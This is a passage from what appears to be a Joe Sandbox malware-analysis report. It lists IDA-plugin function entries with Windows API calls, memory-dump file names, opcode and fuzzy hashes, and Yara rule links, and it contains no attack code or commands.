Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
Instruction ID: 0ea81b0b8c42995916bb1f95f67c27d781d53a942660894a50f5984ead52efc1
Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
Instruction Fuzzy Hash: F0D09E18F8860A62FB543B715C9B4B992156F48B01F9424BCD94F073D3DD6EA44D6260

Function 00007FF73AE2027C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE202C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE203B7

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
Instruction ID: 9fe64c1ea9bac4f158ca46ec30e15588a9c00d093470109ba026b8fb427c634e
Opcode Fuzzy Hash: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
Instruction Fuzzy Hash: 95514A29B4925966F674FE35940377AE281BF40BA5F848778DD6D037C6CE3CE800A620

Function 00007FF73AE2B11C Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF73AE2AF99,?,?,00000000,00007FF73AE2B04E), ref: 00007FF73AE2B18A
GetLastError.KERNEL32(?,?,?,00007FF73AE2AF99,?,?,00000000,00007FF73AE2B04E), ref: 00007FF73AE2B194

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
Instruction ID: 6236045319e1e640f3ae83a452524a8b764684dbd221092059e243eb8a4484b6
Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
Instruction Fuzzy Hash: 29216D29F5878A60FE507720945727DE2816F80BE0FC443BCDA5E073C5CE2CE445A320

Function 00007FF73AE2C6F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF73AE2C88D), ref: 00007FF73AE2C740
GetLastError.KERNEL32(?,?,?,?,?,00007FF73AE2C88D), ref: 00007FF73AE2C74A

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
Instruction ID: b9f617885152aa6a23ed515512f55b6f74963e0c09e8c6b9065e0902d687442c
Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
Instruction Fuzzy Hash: F311EF6AA08A9591EA10BB35E80A069A361AB84FF4F940375EEBE077D9CF7CD0519740

Function 00007FF73AE280BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE27F39), ref: 00007FF73AE280DF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE27F39), ref: 00007FF73AE280F5

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 6407c983105320eb51bd989624a62bc8d87a63a3f1faf402972498077c5d17e8
Instruction ID: df34b71d1b1a2412e20803089e27fe47129005f95d39ec6375e824444e67d333
Opcode Fuzzy Hash: 6407c983105320eb51bd989624a62bc8d87a63a3f1faf402972498077c5d17e8
Instruction Fuzzy Hash: C9018E2690C25592F760BB14E40327EF7A0FB85B61FA04279EAA9019D8DF3DD010EB20

Function 00007FF73AE2AF0C Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF22
GetLastError.KERNEL32(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF2C

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
Instruction ID: 9e096e98c74cb3c71455a34ce45afc770a7f55d656537c29049d596d1d0a2e70
Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
Instruction Fuzzy Hash: 2CE0865CF89206A2FF147BB1544707592509F84B01FC044FCC91E47292DE2C68856630

Function 00007FF73AE286A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF73AE286AC
GetLastError.KERNEL32 ref: 00007FF73AE286B6

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
Instruction ID: 6ebdb07c593c13708ec9e9de26b1b98f8fb02eb2ed118d2fb8d977447bb6d9bb
Opcode Fuzzy Hash: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
Instruction Fuzzy Hash: CDD0122CFD9507F1F61437760C8B039D2902F45B31FD046B8C02F811E0DE6DA0552531

Function 00007FF73AE27E24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF73AE27E28
GetLastError.KERNEL32 ref: 00007FF73AE27E32

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
Instruction ID: 01ba3dcc91df8cce8928e8c98a1e64aa5c847efa90a157c630eb4af74ff40820
Opcode Fuzzy Hash: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
Instruction Fuzzy Hash: A5D0C918F99507A1F61437751897039A2A02F45B31FD046BCC42A801E0DE2CA8853531

Function 00007FF73AE17D40 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A

_findclose.LIBCMT ref: 00007FF73AE17F99

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
Instruction ID: 744c7b4c9ce51d411a50b9c33d12edc05c3a73ffdb3d8594521e3bfc12943a94
Opcode Fuzzy Hash: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
Instruction Fuzzy Hash: 7C71C156E18BC581E611EB2CC5462FDB360F7A9B4CF94E365DB8C12592EF28E2C9D700

Function 00007FF73AE2C46C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE2C494

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
Instruction ID: 4f37494e656d39e286f68293b54c18e88830fef85e2a9d447241e7fe3acad383
Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
Instruction Fuzzy Hash: 3E412676988219A3FA34FB28E547279B3A0EF95741F940279D68E43680CF2EE402D771

Function 00007FF73AE182B0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF73AE1835A

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: c646a1fd7cc9b3761defa3e231b998e5652de75a30cba53cf63e693a73b2805e
Instruction ID: 0192222b72914a9259e605ea8aab5729ace8920b57e93f85a1a3304279c8080d
Opcode Fuzzy Hash: c646a1fd7cc9b3761defa3e231b998e5652de75a30cba53cf63e693a73b2805e
Instruction Fuzzy Hash: 5121E729B482A666FA14BB12A4477FAE651BF45BD4FCC50B0EE0D07786CF3CE441D620

Function 00007FF73AE2BEFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE2BF82

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cf493e245973df117cfb9bdb4be30e1b7cc3e093745a0bb3aa436662ba277ffd
Instruction ID: 6b2767c6ddc213650f03c995a2bdbfed7abf48ffa3f747ce7439354d141f9efb
Opcode Fuzzy Hash: cf493e245973df117cfb9bdb4be30e1b7cc3e093745a0bb3aa436662ba277ffd
Instruction Fuzzy Hash: 2531C725A98659A5F741BB11880337CE750AF80B62FC101B9EE2D473D2CE7CE441AB30

Function 00007FF73AE29EF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF73AE29F1F

Part of subcall function 00007FF73AE2A018: GetModuleHandleExW.KERNEL32 ref: 00007FF73AE2A03D
Part of subcall function 00007FF73AE2A018: GetProcAddress.KERNEL32 ref: 00007FF73AE2A053
Part of subcall function 00007FF73AE2A018: FreeLibrary.KERNEL32 ref: 00007FF73AE2A07A

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
Instruction ID: f333402bb754fef76d99fca79eebd3071a99fe6103a169b4c8a6a30c81e987be
Opcode Fuzzy Hash: faec72fd928e516d4d760f4a89c99e996b8e0a7f11e884b20412009018256aa7
Instruction Fuzzy Hash: 8D21BC36A047499AFB60BF64C8422FC73A4EB04718F841639E62C47AC5DF38D484DB60

Function 00007FF73AE264A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE2640D

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction ID: 8201008df1a4bbf7002efac873fa992f820b9b52991f5db7dd88d28e22a31a7b
Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction Fuzzy Hash: 25118425E5C64991FA60BF11D503279E360FF85B80F8845B9EA8D47A86DF7CD440A720

Function 00007FF73AE36CAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE36CCF

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
Instruction ID: 5150b45bfeace3e5f3ef5b65a1581e8a39efc455fc8f095046e0815bba6db3db
Opcode Fuzzy Hash: c0ad99c40d53020ccb328d164a39266f2dfd48b33636b9c7a3122610519525da
Instruction Fuzzy Hash: 23219536A08A4196FB61BF28E44337AB7A0EB84F54F944234EA5D476D9DF3DD801DB10

Function 00007FF73AE204FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE20550

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction ID: 0305085056023d59a0a55e85421aca69e337a296583bdba41f6f112fce73c0e4
Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction Fuzzy Hash: CE01DB25A8874950FA14FF569903079E7A5BF85FE0F8846B9DE6C17BDACE3CD4015310

Function 00007FF73AE27AB0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE27AEE

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
Instruction ID: 99e670fcd19cf1c7b3ad865664280ccc4e6b4129534473edc77bf6926aee1118
Opcode Fuzzy Hash: af50f55acc611b54009b4ea4d598cf3424078558251c62237d26469a9987366e
Instruction Fuzzy Hash: 9F018468E8D64B60FE547B61A943175F2A1AF427A0FD405FCE92D42AC6DE2CE4417230

Function 00007FF73AE2F158 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF73AE2B9A6,?,?,?,00007FF73AE2AB67,?,?,00000000,00007FF73AE2AE02), ref: 00007FF73AE2F1AD

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
Instruction ID: d6bed0654ef0c4690bb3f1e59aa5d467a9a5098281e12168a0c3deb2915d2e49
Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
Instruction Fuzzy Hash: 69F0F95DF8960EA1FE547661D9132B9D2915F88B40FCC44B9CD0E863D2DE5CE491A330

Function 00007FF73AE2DBBC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF73AE20D24,?,?,?,00007FF73AE22236,?,?,?,?,?,00007FF73AE23829), ref: 00007FF73AE2DBFA

Memory Dump Source

Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true

Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
Instruction ID: 384d18f9ae6dcfb1bd8c775481e7dc2a2917044286d3bb88712fe211c470a4e3
